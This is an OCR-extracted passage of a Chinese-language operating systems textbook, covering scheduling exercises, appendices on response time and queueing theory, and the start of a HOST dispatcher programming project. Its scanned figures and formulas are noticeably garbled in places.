9.14 考虑 一 个 有 5 个 优先 级 队列 的 多 级 反馈 调度 策略 ， 每 一 个 优先 级 队列 采用 时 间 片 轮转 策略 ， 时 间 片 
大 小 为 3 个 单位 ， 每 一 优先 级 的 最 大 执行 时 间 为 2 个 时 间 片 (或 6 个 单位 )。 每 一 个 需要 CPU 的 作 
业 从 最 高 优先 级 开始 ， 随 着 CPU 时 间 的 增长 ， 优 先 级 降低 。 系 统 总 是 把 CPU 分 配给 最 高 优先 级 的 
作业 。 
a) 对 CPU 密集 型 进程 ， 这 一 调度 策略 是 否 能 很 好 地 工作 ? 请 解释 理由 。 
b) 这 一 调度 算法 对 VO 密集 型 进程 是 否 有 好 处 ? 请 解释 理由 。 
c) 会 出 现 饥饿 现象 吗 ? 如 果 会 ， 怎 样 对 该 策略 进行 修改 以 避免 饥饿 现象 ? 

915 ”在 基于 优先 级 的 进程 调度 中 ， 如 果 当 前 没有 其 他 优先 级 更 高 的 进程 处 于 就 绪 状 态 ， 调 度 程序 将 把 控 
制 权 交 给 一 个 特定 的 进程 。 假 设 在 进行 进程 调度 决策 时 没有 使 用 其 他 信息 ， 还 假设 进程 的 优先 级 是 
在 进程 被 创建 时 建立 的 ， 并 且 不 会 改变 。 在 这 样 的 系统 中 ， 为 什么 使 用 Dekker 方 法 ( 见 A.I 节 ) 解 
决 互 斥 问 题 是 非常 “危险 ”的 ? 通过 说 明 会 发 生 什 么 不 希望 发 生 的 事件 和 如 何 发 生 这 种 事件 来 解释 
该 问题 。 

9.16 5 个 批 作业 ,从 A 到 EE, 同时 到 达 计 算 机 中 心 。 它 们 的 估计 运行 时 间 分 别 为 15、9、3、6 和 12 分 钟 ， 
它们 的 优先 级 ( 外 部 定义 ) 分 别 为 6、3、7、9 和 4( 值 越 小 ， 表 示 的 优先 级 越 高 )。 对 下 面 的 每 种 调 
度 算法 ,确定 每 个 进程 的 周转 时 间 和 所 有 作业 的 平均 周转 时 间 (忽略 进程 切换 的 开销 )， 并 解释 是 如 
何 得 到 这 个 结果 的 。 对 于 最 后 三 种 情况 ， 假 设 一 次 只 有 一 个 作业 运行 直到 它 结束 ， 并 且 所 有 作业 都 
完全 是 处 理 器 密集 型 的 。 
a) 时 间 片 为 1 分 钟 的 轮转 法 。 
b) 优先 级 调度 。 
c) FCFS (X 15, 9. 3, 6 和 12 的 顺序 运行 )。 
d) 最 短 作 业 优 先 。 


附录 OA ”响应 时 间 


响应 时 间 是 系统 对 某 个 给 定 的 输入 做 出 反应 所 需要 的 时 间 。 在 一 个 交互 事务 中 ， 响 应 时 间 可 以 定义 为 
从 用 户 最 后 一 次 击 键 到 计算 机 开始 显示 结果 之 间 的 时 间 。 对 不 同类 型 的 应 用 程序 ， 定 义 有 略微 的 不 同 。 一 
般 而 言 ， 它 是 指 系统 用 于 响应 执行 某 个 特定 任务 的 请 求 所 花费 的 时 间 。 

理想 情况 下 ， 用户 希 望 对 任何 应 用 程序 的 响应 时 间 都 非常 短 。 但 是 ,更 短 的 响应 时 间 通 常 总 是 需要 更 
大 的 花费 ， 这 个 花费 来 自 两 方面 : 

@ 计算 机 处 理 能 力 : 处 理 器 速度 越 快 ， 响 应 时 间 越 短 。 当 然 ， 处 理 能 力 的 增加 意味 着 成 本 的 增加 。 

@ 竞争 要 求 : 对 一 些 进程 提供 快速 的 响应 时 间 必 然 不 利于 另外 一 些 进 程 。 
因此 ,一 个 给 定 级 别 的 响应 时 间 值 必须 通过 达到 这 个 响应 时 间 的 花费 来 评估 。 

基于 [ MART88 ]， 表 9.7 列 出 了 6 种 常用 的 响应 时 间 范 围 。 当 要 求 响应 时 间 小 于 1 秒 时 ， 就 会 面临 设 
计 上 的 困难 。 响 应 时 间 小 于 1 秒 的 要 求 是 由 控制 正在 运行 的 外 部 活动 或 以 某 种 方式 与 其 进行 交互 的 系统 产 
生 的 ， 如 一 个 汇编 行 ;， 这 时 的 要 求 是 很 直接 的 。 当 考虑 人 机 交互 时 ， 例 如 数据 输入 应 用 ， 就 处 于 会 话 响应 
时 间 的 范围 。 在 这 种 情况 下 ， 仍然 存 在 对 短 响应 时 间 的 要 求 ， 但 是 可 能 很 难 估 计 可 以 接受 的 时 间 长 度 。 


表 9.7 响应 时 间 的 范围 





这 排除 了 会 话 交互 。 对 某 些 类 型 的 应 用 程序 ， 某 些 类 型 的 用 户 可 能 愿意 坐 在 终端 前 等 待 
15 秒 以 上 ， 以 得 到 一 个 简单 查询 的 回答 。 但 是 ， 对 比较 忙 的 用 户 而 言 ， 等 待 15 秒 是 无 法 
忍受 的 。 如 果 发 生 这 类 延迟 ， 系 统 应 该 设计 成 主 用 户 转 去 做 其 他 的 活动 ， 过 一 段 时 间 再 来 


请 求 该 响应 





oo R205 


( # ) 
38 说 RA 
对 需要 操作 员 在 短程 存储 器 〈 操作 员 的 存储 器 ， 而 不 是 计算 机 的 ) 中 保留 信息 的 会 话 来 
大 于 4 说 ， 这 仍然 太 长 。 这 类 延迟 给 解决 问题 的 活动 带 来 很 大 的 约束 ， 并 且 可 能 影响 数据 输入 的 


活动 。 但 是 ， 在 主要 程序 关闭 后 ， 比 如 一 个 事务 结束 时 延迟 4 到 15 秒 是 可 以 忍受 的 
大 于 2 秒 的 延迟 会 限制 高 度 集中 的 终端 操作 请 求 。 当 用 户 集中 精力 完成 工作 时 ， 在 终端 上 
等 待 2 到 4 秒 看 上 去 是 非常 长 的 时 间 。 同样 , 在 次 要 程序 关闭 后 , 该 范围 的 延迟 是 可 以 接受 的 
当 终 端 用 户 必须 记 住 多 个 响应 中 的 信息 时 ， 响 应 时 间 必 须 非 常 短 。 要 记 住 的 信息 越 详细 ， 对 
小 于 2 秒 的 响应 时 间 的 要 求 就 越 强烈 。 对 于 精心 设计 的 终端 活动 ，2 秒 是 一 个 重要 的 响应 极限 
一 些 需要 深入 思考 的 工作 ， 特 别 是 图 形 应 用 程序 ， 需 要 非常 短 的 响应 时 间 ， 使 得 用 户 在 
一 段 比 较 长 的 时 间 里 能 保留 兴趣 和 注意 力 
按 下 一 个 键 ， 在 屏幕 上 看 到 这 个 字符 ， 或 者 用 鼠标 点 击 一 个 屏 基 对象 时 ， 需 要 几乎 即时 
十 分 之 一 秒 的 响应 时 间 | 的 响应 时 间 小 于 0.1 秒 。 如 果 设 计 者 避免 使 用 不 同 的 语法 ( 命令、 记忆 、 语 音 等 )， 使 用 鼠 
标 需 要 非常 快 的 交互 


许多 研究 [ SHNE84, THAD81, GUYN88 ] 都 证 实 了 快速 的 响应 时 间 对 交互 式 应 用 程序 的 生产 率 来 说 
是 非常 重要 的 。 这 些 研究 表明 ， 当 计算 机 和 用 户 的 交互 步伐 可 以 确保 互 不 等 待 时 ， 生 产 率 将 显著 提高 ， 在 
计算 机 上 完成 工作 的 代价 随 之 下 降 ， 质量 也 随 之 提高 。 有 一 点 在 过 去 曾 被 广泛 接受 : 相对 较 慢 的 响应 时 间 
(到 2 秒 为 止 ) 可 以 被 大 多 数 交 互 应 用 所 接受 , 原因 是 用 户 正 在 思考 下 一 个 任务 。 但 是 现在 看 来 ， 当 达到 快 
速 响应 时 间 时 ， 生 产 率 会 随 之 提高 。 

关于 响应 时 间 的 研究 结果 基于 对 在 线 事务 处 理 的 分 析 。 事 务 处 理由 来 自 终 端的 用 户 命令 和 系统 的 答复 
组 成 ， 它 是 在 线 系统 用 户 的 基本 工作 单位 ， 可 以 划分 成 两 个 时 间 序 列 ， 

@ 用 户 响 应 时 间 : 用 户 接收 到 关于 一 条 命令 的 完整 答复 到 输入 下 一 条 命令 之 间 的 时 间 。 这 个 时 间 通 

常 称 为 思考 时 间 。 

@ 系统 响应 时 间 : 从 用 户 输入 一 条 命令 到 在 终端 上 显示 出 完整 的 响应 之 间 的 时 间 。 

图 9.20 给 出 了 一 个 例子 ,说 明了 减少 系统 响应 时 间 的 结果 。 该 图 显示 了 工程 师 使 用 计算 机 辅助 设计 图 
形 程序 设计 集成 电路 芯片 和 主板 的 研究 结果 [ SMIT83 ]。 每 个 事务 处 理由 工程 师 以 某 种 方式 改变 显示 在 屏 
幕 上 的 图 形 图 像 的 命令 组 成 。 结 果 表 明 ， 当 系统 响应 时 间 降 低 时 ， 事 务 处 理 的 速度 增加 ; 当 系 统 响 应 时 间 
低 于 1 秒 时 ， 事 务 处 理 的 速度 有 显著 的 提高 。 原 因 是 当 系 统 响应 时 间 降 低 时 ， 用 户 响 应 时 间 也 降低 了 。 这 
与 短程 记忆 和 人 的 注意 力 范围 相关 。 


4000 


2 到 4 秒 


DF 2B 


低 于 1 秒 的 响应 时 间 


3500 
3000 
2500 


2000 


每 用 户 小 时 的 事务 数目 





0 | no | 
0.25 0.50 0.75 1.00 1.25 1.50 
系统 响应 时 间 〈 秒 ) 


图 9.20 ”高 性 能 作 图 系统 的 响应 时 间 结 果 
响应 时 间 表 现 得 非常 重要 的 另 一 个 领域 是 万 维 网 (WWW )， 不 论 是 在 Internet 上 还 是 在 公司 内 部 网 上 


都 是 如 此 。 一 个 典型 的 Web 页 在 用 户 屏幕 上 显示 所 需要 的 时 间 相 差 很 大 。 响 应 时 间 可 以 根据 用 户 在 会 话 中 
的 级 别 来 测量 ， 特 别 地 ， 具 有 快速 响应 时 间 的 系统 能 够 博得 更 多 用 户 的 注意 。 正 如 图 9.21 所 示 [SEVC96]， 
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具有 3 秒 或 更 好 的 响应 时 间 的 Web 系统 得 到 了 更 多 用 户 的 注意 ， 响 应 时 间 超 过 10 秒 会 使 用 户 失去 信心 ， 
从 而 终止 会 话 。 


Web 用 户 集 中 












[] } 
1 1 
在 电缆 服务 中 改变 TV 通道 
i i 
销售 点 的 信用 卡 认证 
Saher Rae Bos aie: 


8.8kbps (fil il BE BE Be 


其 他 响应 时 间 


Oo 
w 


10 30 
BYTE] C&P) 


图 9.21 响应 时 间 和 需求 


附录 9B 排队 系统 


本 章 以 及 后 面 许多 章 都 使 用 了 排队 论 。 在 这 个 附录 中 ， 给 出 了 关于 排队 系统 的 简单 定义 ， 并 定义 关键 
术语 。 对 于 不 太 熟 悉 排 队 分 析 的 读者 ， 在 WilliamStallings.com/StudentSupport.html 的 Computer Science 
Student Resource Site 站 点 中 可 以 找到 关于 排队 分 析 的 基本 复习 内 容 。 


为 什么 要 进行 排队 分 析 


通常 基于 现 有 的 负载 信息 或 者 基于 对 一 个 新 环境 的 估计 负载 对 性 能 进行 映射 是 很 必要 的 。 这 有 一 系列 
的 办 法 : 

1) 基于 实际 值 做 事后 分 析 。 

2) 通过 现 有 的 经 验 对 未 来 的 环境 按 比 例 做 出 简单 的 映射 。 

3 ) 基于 排队 论 开 发 一 个 分 析 模型 。 

4) 编写 仿真 模型 的 程序 并 运行 。 

选择 1 根本 就 不 是 一 个 选项 : 这 样 将 要 不 停 地 等 待 ， 然 后 看 发 生 的 事情 。 对 用 户 而 言 ， 是 一 件 非常 不 从 
快 的 事情 ， 并 且 也 不 愿意 去 购买 相应 的 产品 。 选 择 2 听 起 来 好 像 很 可 取 ， 但 分 析 之 后 ， 会 发 现 对 未 来 的 映射 
不 可 能 有 可 信和 度 ， 因此， 即使 尝试 一 些 精确 的 模型 也 是 无 意义 的 。 然 而 ,一 个 粗略 的 映射 将 提供 一 个 大 概 的 
估计 ， 这 种 方法 的 问题 是 大 多 数 系统 在 负载 不 断 变化 的 情况 下 的 行为 不 是 直观 上 可 以 预料 的 。 如 果 在 一 个 环 
境 中 拥有 共享 的 设施 〈 例如 网 络 、 传 输 线路 、 分 时 系统 )， 那 从 系统 将 以 指数 的 方式 来 响应 以 应 对 需求 。 

图 9.22 是 一 个 代表 性 的 例子 。 上 面 的 线 显示 了 随 荐 共享 设施 负载 的 增加 ,用户 响应 时 间 的 变化 。 负 载 
作为 容量 的 一 部 分 来 表示 。 因 此 ,如 果 考 虑 一 个 每 秒 钟 能 够 处 理 并 转发 1000 个 数据 包 的 路 由 器 , 那么 负载 
0.5 代表 包 的 到 达 速 率 是 每 秒 钟 500 个 , 并 且 响 应 时 间 就 是 转发 任何 一 个 到 来 的 包 所 花费 的 时 间 。 下 面 一 条 
线 是 基于 负载 到 达 0.5 的 系统 行为 信息 的 简单 的 映射 9 。 注意 , 采用 简单 映射 后 , 看 起 来 很 好 , 但 实际 上 当 
负载 超过 0.8 ~ 0.9 时 ， 系 统 已 经 崩溃 了 。 

因此 需要 使 用 更 加 精确 的 预测 工具 。 选 择 3 利用 了 分 析 模 型 ， 分 析 模 型 可 以 用 一 系列 的 等 式 来 表示 ， 
而 每 个 等 式 可 以 根据 要 求 的 参数 (MMA, Aas) 来 计算 。 对 于 计算 机 、 操 作 系统 、 网 络 问题 以 及 


加 下面 一 条 线 基于 对 负载 为 0.5 的 数据 进行 三 阶 多 项 式 拟 合 。 
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现实 世界 中 的 很 多 实际 问题 , 基于 排队 论 的 分 析 模型 提供 了 一 一 个 与 现 实 相符 合 的 估计 。 排 队 论 的 缺点 在 于 : 
针对 那些 比较 关注 的 参数 ， 必 须 通 过 作出 一 系列 简单 的 假设 来 导出 相应 的 等 式 。 


经 验 的 限制 


哟 应 时 间 


实际 响应 时 间 


映射 的 响应 时 间 
Ds T T 5 E Ea T N aa 


0.0 0.2 0.4 0.6 0.8 
系统 负载 〈 作 为 容量 的 一 部 分 


图 9.22 ”预测 与 实际 的 响应 时 间 


最 后 一 种 方法 就 是 模型 方法 。 在 这 里 ， 给 定 一 个 功能 强劲 的 并 且 灵 活 的 模型 编程 语言 ， 分 析 者 就 可 以 
对 现实 情况 的 许多 细节 建 模 ， 并 且 避 免 像 排队 论 那 样 需 要 做 出 很 多 假设 。 然 而 ， 在 大 多 数 情 况 下 ， 仿 真 模 
列 是 不 需要 的 ， 至 少 在 分 析 的 开始 步骤 中 是 不 建议 使 用 的 。 还 有 ， 现 在 的 测量 和 对 未 来 的 负载 的 预测 都 伴 
随 着 一 定量 的 边界 误差 ， 因 此 ， 无 论 仿真 模型 多 么 好 ， 由 于 系统 输入 的 质量 ， 最 后 结果 的 值 也 是 有 限 的 。 而 
对 排队 论 来 说 ， 尽 管 需 要 很 多 的 假设 ,但 排队 论 最 终 的 结果 与 仔细 选择 的 模拟 分 析 的 结果 非常 接近 。 而 且 ， 
对 于 一 个 给 定 的 问题 ， 排 队 分 析 在 字面 上 很 快 就 能 完成 ， 而 仿真 则 需要 更 长 的 时 间 去 编写 程序 和 运行 程序 。 
因此 ， 分 析 者 掌握 基本 的 排队 论 还 是 需要 的 。 


单 服务 器 队列 


图 9.23 给 出 了 一 一 个 最 简单 的 排队 系统 。 系 统 的 中 心 单元 是 一 个 服务 器 ， 它 给 项 目 提供 某 些 服务 。 来 自 
项 目 集 的 项 目 到 达 系 统 并 接受 服务 。 如 果 服 务 器 空闲 ， 则 一 个 项 目 可 以 立即 得 到 服务 。 否 则 ， 到 达 的 项 目 
加 入 等 待 行列 9 中 。 当 服务 器 完成 对 一 个 项 目的 服务 后 ， 这 一 项 目 离开 。 如 果 此 时 还 有 项 目 在 队列 中 等 待 ， 
则 其 中 的 一 个 项 目 被 立即 分 派 给 服务 器 。 这 个 模型 中 的 服务 器 可 以 表示 为 一 组 项 目 执行 某 种 功能 或 服务 的 
任何 事物 〈 例 如， 处 理 器 给 进程 提供 服务 ;传输 线 给 数据 包 或 数据 帧 提供 传输 服务 ; IO 设备 为 O 请 求 提 
供 读 / 写 服务 )。 
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等 待 行列 
《队列 》 







到 达 分 派 原则 离开 
和 = 到 达 速 度 
eo Ts= 服 务 时 间 
w= 等 待 项 目 六 = 利用 率 
Tam 65 TB) 
[一 
.、 了 = 驻 留 在 排队 系统 中 的 项 目 
T= 驻 留 时 间 


图 9.23 排队 系统 结构 和 单 服务 器 队列 的 参数 
表 9.8 总 结 了 一 些 与 排队 模型 相关 的 重要 参数 。 项 目 以 平均 速度 ( 每 秒 到 达 的 项 目 数 ) 4 到 达 。 在 任何 
一 个 给 定 的 时 刻 ， 一 定数 目 ( 零 个 或 多 个 ) 的 项 目 在 队列 中 等 待 ， 平 均等 待 的 项 目 数 为 w， 一 个 项 目 必须 


日 ”等 待 时 间 在 许多 文献 中 称 为 队列 。 除 非特 别 声明 ， 我 们 使 用 术语 队列 表示 等 竺 行列。 
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等 待 的 平均 时 间 为 7。。7T 是 对 所 有 到 来 的 项 目的 平均 , 包括 那些 根本 就 没有 等 待 的 项 目 。 服 务 器 处 理 到 来 
项 目的 平均 服务 时 间 为 7,， 这 是 从 给 处 理 器 分 派 一 个 项 目 到 该 项 目 离开 处 理 器 之 间 的 时 间 间 隔 。 利 用 率 p 
是 服务 器 忙 的 时 间 部 分 ， 可 以 通过 在 一 些 时 间 区 间 上 测量 得 到 。 最 后 还 有 两 个 应 用 于 整个 系统 的 参数 ， 驻 
留 在 系统 中 的 项 目 平均 数 +， 包括 正 在 被 服务 的 项 目 ( 如果 有 ) 和 正在 等 待 的 项 目 (如 果 有 ); 以 及 一 个 项 
目 在 系统 中 花费 的 平均 时 间 T,， 包 揪 等 待 和 被 服务 的 时 间 ， 通 常 称 做 平均 驻 留 时 间 S 


HWS 排队 系统 中 的 符号 
— 5# 号 BB 





A 到 达 速 度 ; 平均 每 秒 到 达 的 数目 

Ts 每 个 到 达 项 目的 平均 服务 时 间 ; 服务 时 间 总 量 不 包括 在 队列 中 等 待 的 时 间 
P 利用 率 ; 设备 ( 服务 器 或 服务 器 组 ) 忙 的 时 间 部 分 

w 等 待 被 服务 的 平均 项 目 数 

Tw 平均 等 待 时 间 ( 包括 必须 等 待 的 项 目 和 等 待 时 间 等 于 0 的 项 目 ) 


~ 


平均 驻 留 在 系统 中 的 项 目 数 (正在 等 竺 和 正在 被 服务 ) 
平均 驻 留 时 间 ; 一 个 项 目 在 系统 中 花费 的 时 间 ( 等 待 和 被 服务 ) 


如 果 假 设 队 列 的 容量 是 无 限 的 ， 则 系统 中 不 会 丢失 任何 项 目 ， 它 们 仅仅 会 被 延迟 ， 直 到 得 到 服务 。 在 
这 种 情况 下 ， 离 开 速 度 等 于 到 达 速 度 。 到 达 速 度 增 加 ， 利 用 率 也 会 随 之 增加 ， 从 而 出 现 拥塞 。 队 列 变 得 很 
长 ， 从 而 增加 了 等 待 时 间 。 当 p=1 时 ， 服 务 器 达到 饱和 ,工作 时 间 为 100%。 因 此 ， 系 统 可 以 处 理 的 输入 
速度 理论 上 最 大 值 为 


a 


1 
Jom = 


但 是 ， 队 列 变 得 非常 大 ， 接 近 系 统 饱和 ， 当 p= 1 时 ， 增 长 是 没有 限制 的 。 实 际 的 考虑 ， 如 响应 时 间 要 
求 或 缓冲 区 大 小 ， 通 常 把 服务 器 的 输入 速度 限制 在 理论 最 大 值 的 70% ~ 90% 之 间 。 

在 典型 情况 下 有 下 列 假设 : 

© 项 目 集群 : 在 典型 情况 下 ,假设 一 个 无 限 集群 ,这 意味 着 到 达 速 度 不 会 因为 集群 数目 的 减少 而 改变 。 
如 果 集 群 数目 是 有 限 的 ， 当 前 在 系统 中 的 项 目 数 会 减少 到 达 的 数目 ， 这 会 成 比例 地 降低 到 达 速 度 。 

@ 队列 大 小 : 在 典型 情况 下 ， 假设 队列 大 小 是 无 限 大 的 ， 这样， 等 待 行列 可 以 没有 界限 地 增长 。 而 
对 于 有 限 队 列 ， 项 目 可 能 会 从 系统 中 丢失 。 实 际 上 ， 任 何 队列 都 是 有 限 的 ， 但 在 任何 情况 下 ， 这 
对 于 分 析 没 有 实质 性 的 差别 。 

@ 分 派 原则 : 当 服务 器 空闲 时 ， 并 且 如 果 有 一 个 以 上 的 项 目 正在 等 待 ， 就 必须 进行 决策 ， 确 定 接 下 
来 给 服务 器 分 派 娜 个 项 目 。 最 简单 的 方法 是 先进 先 出 ， 这 个 原则 是 术语 “队列 ” 隐 含 使 用 的 原则 。 
男 一 种 可 能 的 原则 是 使 用 后 进 先 出 。 在 实际 中 可 能 遇 到 基于 服务 时 间 的 分 派 原则 ， 例 如 ， 一 个 分 
组 切换 节点 可 以 基于 最 短 优先 (产生 许多 输出 包 ) 或 最 长 优先 ( 相对 于 传送 时 间 ， 使 得 处 理 时 间 
最 小 ) 选择 包 的 分 派 。 遗 憾 的 是 ， 很 难 对 基于 服务 时 间 的 原则 进行 建 模 分 析 。 


多 服务 器 队列 


图 9.24 显示 了 简单 模型 推广 到 多 服务 器 ， 所 有 的 服务 器 共享 同一 个 队列 。 如 果 一 项 到 达 ， 并 且 至 少 有 
一 个 服务 器 可 用 ， 该 项 立即 被 分 配 到 该 服务 器 。 假 设 所 有 的 服务 器 都 是 相同 的 ， 因 此 ， 如 果 有 多 个 服务 器 
可 用 ， 为 该 项 选择 哪个 服务 器 是 没有 区 别 的 。 如 果 所 有 的 服务 器 都 忙 ， 则 开始 形成 一 个 队列 。 只 要 一 个 服 
务 器 变 成 空闲 的 ， 则 使 用 分 派 原则 从 队列 中 给 它 分 派 一 项 。 

除了 利用 率 以 外 ， 图 9.23 中 的 所 有 参数 都 可 以 照搬 到 多 服务 器 的 情况 下 ,并 且 具 有 相同 的 解释 。 如 果 
有 NN 个 同样 的 服务 器 , p 是 每 个 服务 器 的 利用 率 , N, 为 整个 系统 的 利用 率 , 后 面 一 项 通常 称 为 业务 量 强度 uo 
因此 ， 理 论 上 的 最 大 利用 率 为 Nx 100%， 最 大 输入 速度 为 


N 
Am = 


个 ”在 某 些 文献 中 称 做 平均 排队 时 间 ， 而 在 另外 一 些 文献 中 却 用 平均 排队 时 间 表 示 在 队列 中 等 待 (被 服务 前 ) 所 
花费 的 时 间 。 
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到 达 队列 ”分派 原则 
人 
全 到 达 速 度 












到 达 
全 到 达 速 度 


b) 多 个 单 服务 器 队列 
图 9.24 多 服务 器 队列 与 多 个 单 服务 器 队列 的 对 比 


多 服务 器 队列 的 重要 特性 与 单 服务 器 队列 的 重要 特性 相对 应 。 也 就 是 说 ， 假 设 无 限 的 项 目 集群 和 无 限 
的 队列 大 小 以 及 在 所 有 服务 器 间 共 享 一 个 无 限 队 列 。 除 非特 别 声明 ,调度 原则 为 FIFO。 对 于 多 服务 器 的 情 . 
况 ， 如 果 假 设 所 有 的 服务 器 都 是 相同 的 ， 为 一 个 等 待 项 自选 择 一 个 特定 的 服务 器 不 会 影响 服务 时 间 。 
为 了 便于 对 比 ， 图 9.24b 显示 了 多 个 单 服务 器 队列 的 结构 。 


TA BIA 


在 通常 情况 下 ， 排 队 分 析 模 型 假定 到 达 率 服从 泊 松 分 布 (Poisson distribution )。 这 就 是 表 9.6 结果 中 的 
假定 。 我 们 定义 该 分 布 如 下 。 如 果 事 件 按照 泊 松 分 布 到 达 队 列 ， 则 可 表示 为 

Prf 在 时 间 间隔 了 中 有 个 事件 到 达 ] = AD" eA 

E[ 在 时 间 间 隔 7 中 到 达 的 事件 数目 ] = ar 

平均 到 达 率 ， 每 秒 钟 的 事件 数 = A 

按照 泊 松 过 程 所 发 生 的 到 达 通 常 称 为 随机 到 达 。 这 是 因为 在 一 个 小 间隔 时 间 中 一 个 事件 到 达 的 概率 正 
比 于 该 时 间 间 隔 的 长 度 ， 并 且 独 立 于 自 上 一 个 事件 到 达 后 所 经 过 的 时 间 值 。 也 就 是 说 ， 如 果 事件 按照 泊 松 
过 程 到 达 ， 那 么 一 个 事件 在 任何 时 刻 到 达 的 可 能 性 都 是 一 样 的 ， 并 且 与 其 他 事件 到 达 的 时 刻 无 关 。 

泊 松 过 程 的 另 一 个 有 趣 的 性 质 与 指数 分 布 有 关 。 如 果 观 察 两 个 事件 到 达 的 时 间 间 隔 Ta( 称 为 到 达 时 间 间 
隔 )， 我 们 会 发 现 ， 该 值 服从 指数 分 布 : 

Pr[Ta<t]= 1- e7” 


ETA + 


这 样 ， 正 如 所 预计 的 ， 平 均 到 达 间 隔 时 间 是 平均 到 达 率 的 倒数 。 


编程 项 目 2: 主机 调度 shell 程序 


假想 操作 系统 测试 平台 ( Hypothetical Operating System Testbed，HOST ) 是 一 个 多 道 程序 设计 处 理 系 
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统 ， 它 用 四 个 级 别 的 优先 级 进程 调度 程序 来 操作 可 用 的 有 限 资源 。 
四 级 优先 级 调度 程序 

该 调度 程序 以 四 个 优先 级 级 别 来 操作 : 

1. 实时 进程 基于 先 来 先 服务 ， 同 时 抢占 其 他 正在 运行 的 低 优先 级 的 进程 而 立即 被 执行 。 这 些 实时 进程 
能 够 一 直 运行 到 结束 。 

2. 普通 的 用 户 进程 在 一 个 三 级 反馈 的 调度 程序 上 运行 ( 如 图 P2.1 所 示 )。 调 度 程序 的 基本 时 间 片 是 1 
秒 。 这 也 是 反馈 调度 程序 的 时 间 片 的 值 。 





ROZ Cerny 释放 
ae REE oo wa 
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图 P2.1 三 级 反馈 调度 


调度 程序 需要 维护 两 个 从 作业 调度 列表 中 反馈 回来 的 提交 队列 ( 实时 的 和 用 户 优先 级 的 ), 在 每 一 个 调 
度 程序 时 间 片 和 已 经 “到 达 ” 的 作业 被 传送 到 合适 的 提交 队列 时 ， 调 度 列表 就 会 被 检查 。 然 后 提交 队列 也 
会 被 检查 。 任 何 实时 作业 可 以 抢占 其 他 正在 运行 的 作业 而 运行 至 结束 。 

在 低 优 先 级 反馈 调度 程序 重新 活动 以 前 , 任何 的 实时 优先 级 作业 队列 必须 置 为 空 。 在 用 户 作业 队 列 中 ， 
取得 了 可 用 资源 (内 存 和 IO 设备 ) 从 而 可 以 运行 的 任何 用 户 优先 级 作业 都 被 传送 到 适当 的 优先 级 队列 中 。 
反馈 队列 通常 采用 的 操作 是 接受 所 有 具有 最 高 优先 级 的 作业 ， 同 时 在 每 个 作业 完成 时 间 片 以 后 降低 其 优先 
级 。 虽 然 如 此 ， 调 度 程序 仍然 有 能 力 接收 具有 较 低 优先 级 的 作业 并 将 其 插 和 人 到 适当 的 队列 中 。 这 就 确保 了 
如 果 所 有 的 作业 都 在 最 低 的 优先 级 被 接收 ， 调 度 程序 能 够 仿效 一 个 简单 的 轮转 调度 策略 ( 见 图 P2.2 )。 





图 P2.2 ”轮转 调度 程序 


当 所 有 的 具有 较 高 优先 级 的 “就 绕 ” 作 业已 经 运行 完成 后 ， 反 馈 调度 程序 将 启动 或 重新 开始 最 高 优先 
级 的 非 空 队列 的 队列 头 所 代表 的 进程 。 在 下 一 个 时 间 片 到 来 时 ， 如 果 任 何 具 有 相等 或 较 高 优先 级 的 作业 准 
备 就 绪 ， 那 么 当前 的 作业 将 会 被 阻塞 (或 者 终止 并 且 释 放 其 占有 的 资源 )。 

图 P2.3 ( 就 像 在 练习 中 讨论 的 ) BARTER LORE. 


资源 约束 


HOST 拥有 以 下 资源 : 

2 台 打 印 机 

1 台 扫 描 仪 

1 个 调制 解 调 器 

2 个 CD 驱动 
1024MB 的 进程 可 用 内 存 
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低 优先 级 的 进程 可 以 使 用 若干 个 或 所 有 这 些 资 源 ， 但 HOST 调度 程序 会 被 通知 进程 占用 的 资源 以 及 进 
程 什么 时 候 被 提交 。 调 度 程 序 确保 每 一 个 被 请 求 的 资源 仅仅 分 配给 某 个 特定 的 进程 ， 而 在 这 个 进程 的 “就 
绪 到 运行 ”调度 队列 的 整个 生命 期 内 ( 从 初始 的 传递 ， 从 作业 队列 到 优先 级 为 1 ~ 3 的 队列 ， 一 直到 进程 完 
成 ， 包 括 中 间 空 闲 的 时 间 段 ) 将 独 享 该 资源 。 

实时 进程 不 需要 任何 IO 资源 ( 打印机、 扫描 仪 、 调 制 解 调 器 、CD )， 但 是 需要 分 配 内 存 ， 对 实时 作 
业 而 言 ， 内 存 的 需求 通常 是 64MB 或 者 更 少 。 


实时 队列 
作业 分 派 列 表 i 


pe I 
Per PEE i 
1 
1 


用 户 作业 队列 优先 级 1 


到 达 时 间 调 度 器 时 间 
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图 P2.3 ”调度 程序 的 逻辑 流程 


内 存 分 配 


对 每 个 进程 而 言 , 分 配 的 内 存 必须 是 个 连续 的 内 存 块 , 并 且 在 进程 的 整个 生命 期 内 一 直 分 配给 这 个 进程 。 

必须 留 有 充足 的 连续 内 存 空间 ， 以 便 实时 进程 的 执行 不 能 被 阻塞 : 对 于 一 个 运行 的 实时 作业 一 般 留 有 
64MB， 而 剩 下 的 960MB 让 “活动 的 ”用 户 作 业 共 享 。 | 

HOST 的 硬件 单元 MMU 不 能 支持 虚拟 内 存 ， 因 此 在 硬盘 上 没有 内 存 的 交换 区 。 内 存 和 硬盘 都 不 是 页 
式 系统 。 

在 这 些 限 制 中 ， 任 何 合适 的 可 变 内 存 划分 方案 (首次 适应 、 下 次 适应 、 最 优 适应 、 最 差 适 应 、Buddy、 
等 ) 都 可 以 使 用 。 
进程 

HOST 上 的 进程 通过 调度 程序 为 每 个 被 调度 的 进程 创建 新 进程 来 模拟 。 该 主 进程 是 个 通用 的 进程 
(sigtrap.c 被 提供 为 进程 源 )， 这 个 主 进程 可 以 被 任何 优先 级 的 进程 使 用 。 这 个 进程 能 够 以 较 低 的 优先 
级 来 运行 自己 ,周期 性 地 睡 卢 一 秒 并 且 显 示 如 下 信息 : 

1) 当 进 程 开始 时 ， 一 个 消息 显示 了 进程 的 ID。 

2) 进程 执行 过 程 中 每 秒 钟 一 个 规则 的 消息 。 

3) 当 进 程 被 阻塞 、 继 续 运 行 或 终止 时 的 消息 。 

如 果 这 个 主 进程 未 被 调度 程序 终止 , 则 进程 20 秘 后 将 终止 自己 。 主 进程 使 用 为 每 个 唯一 的 进程 随机 产 
生 的 颜色 方案 来 打印 输出 ， 因此 可 以 很 容易 地 区 分 单个 的 进程 片断 。 使 用 这 个 主 进程 而 不 是 用 户 的 进程 。 

一 个 进程 的 生命 周期 如 下 ; 

1) 进程 通过 一 个 初始 化 的 进程 列表 提交 给 调度 程序 输入 队列 ， 列 表 中 指定 了 到 达 时 间 、 优 先 级 、 需 

